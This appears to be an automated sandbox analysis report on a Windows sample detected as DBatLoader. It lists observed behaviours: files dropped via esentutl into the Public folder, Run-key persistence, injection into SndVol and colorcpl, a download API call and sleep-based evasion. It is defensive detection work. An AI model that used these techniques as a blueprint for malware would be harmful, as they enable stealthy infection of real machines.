Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\colorcpl.exe

Window detected: Number of UI elements: 12

Source: 1m181Ru74o.exe

Static file information: File size 1566208 > 1048576

Source: 1m181Ru74o.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x10b200

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 1m181Ru74o.exe, 1m181Ru74o.exe, 00000000.00000002.1425448990.0000000002276000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D07000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1396974122.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1402280809.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: 1m181Ru74o.exe, 00000000.00000002.1425448990.0000000002276000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015AEF000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1425970905.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015B1E000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D07000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296854371.00000000028E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.1396974122.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1402280809.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.6.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match

File source: 0.2.1m181Ru74o.exe.2eb0000.2.unpack, type: UNPACKEDPE

Source: alpha.pif.5.dr

Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02EC895C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02EC895C

Source: alpha.pif.5.dr

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EDD2FC push 02EDD367h; ret	0_2_02EDD35F
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EB63AE push 02EB640Bh; ret	0_2_02EB6403
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EB63B0 push 02EB640Bh; ret	0_2_02EB6403
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EDC37C push 02EDC572h; ret	0_2_02EDC56A
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EB332C push eax; ret	0_2_02EB3368
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EDD0AC push 02EDD125h; ret	0_2_02EDD11D
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC307C push 02EC30C9h; ret	0_2_02EC30C1
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC307B push 02EC30C9h; ret	0_2_02EC30C1
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EDD1F8 push 02EDD288h; ret	0_2_02EDD280
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EDD144 push 02EDD1ECh; ret	0_2_02EDD1E4
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02ECF10C push ecx; mov dword ptr [esp], edx	0_2_02ECF111
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EB6792 push 02EB67D6h; ret	0_2_02EB67CE
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EB6794 push 02EB67D6h; ret	0_2_02EB67CE
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EBD5B0 push 02EBD5DCh; ret	0_2_02EBD5D4
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EBC57C push ecx; mov dword ptr [esp], edx	0_2_02EBC581
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EDC574 push 02EDC572h; ret	0_2_02EDC56A
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02ECAAE4 push 02ECAB1Ch; ret	0_2_02ECAB14
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC8ADC push 02EC8B14h; ret	0_2_02EC8B0C
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC8ADA push 02EC8B14h; ret	0_2_02EC8B0C
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EBCA5E push 02EBCD82h; ret	0_2_02EBCD7A
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EBCBFC push 02EBCD82h; ret	0_2_02EBCD7A
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC887C push 02EC88BEh; ret	0_2_02EC88B6
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02F24850 push eax; ret	0_2_02F24920
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC6958 push 02EC6A03h; ret	0_2_02EC69FB
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC6956 push 02EC6A03h; ret	0_2_02EC69FB
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC791C push 02EC7999h; ret	0_2_02EC7991
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC5E8C push ecx; mov dword ptr [esp], edx	0_2_02EC5E8E
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC2F70 push 02EC2FE6h; ret	0_2_02EC2FDE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004000D8 push es; iretd	9_2_004000D9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040008C push es; iretd	9_2_0040008D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004542E6 push ecx; ret	9_2_004542F9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Ntmftfld.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_004063C6 ShellExecuteW,URLDownloadToFileW,

9_2_004063C6

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Ntmftfld.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

9_2_00418A00

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ntmftfld			Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ntmftfld			Jump to behavior

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02EB6772 IsIconic,

0_2_02EB6772

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02ECAB20 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02ECAB20

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040E18D Sleep,ExitProcess,	9_2_0040E18D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048EEF25 Sleep,ExitProcess,	9_2_048EEF25
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040E18D Sleep,ExitProcess,	13_2_0040E18D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D3EF25 Sleep,ExitProcess,	13_2_06D3EF25

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	9_2_004186FE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	9_2_048F9496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	13_2_004186FE
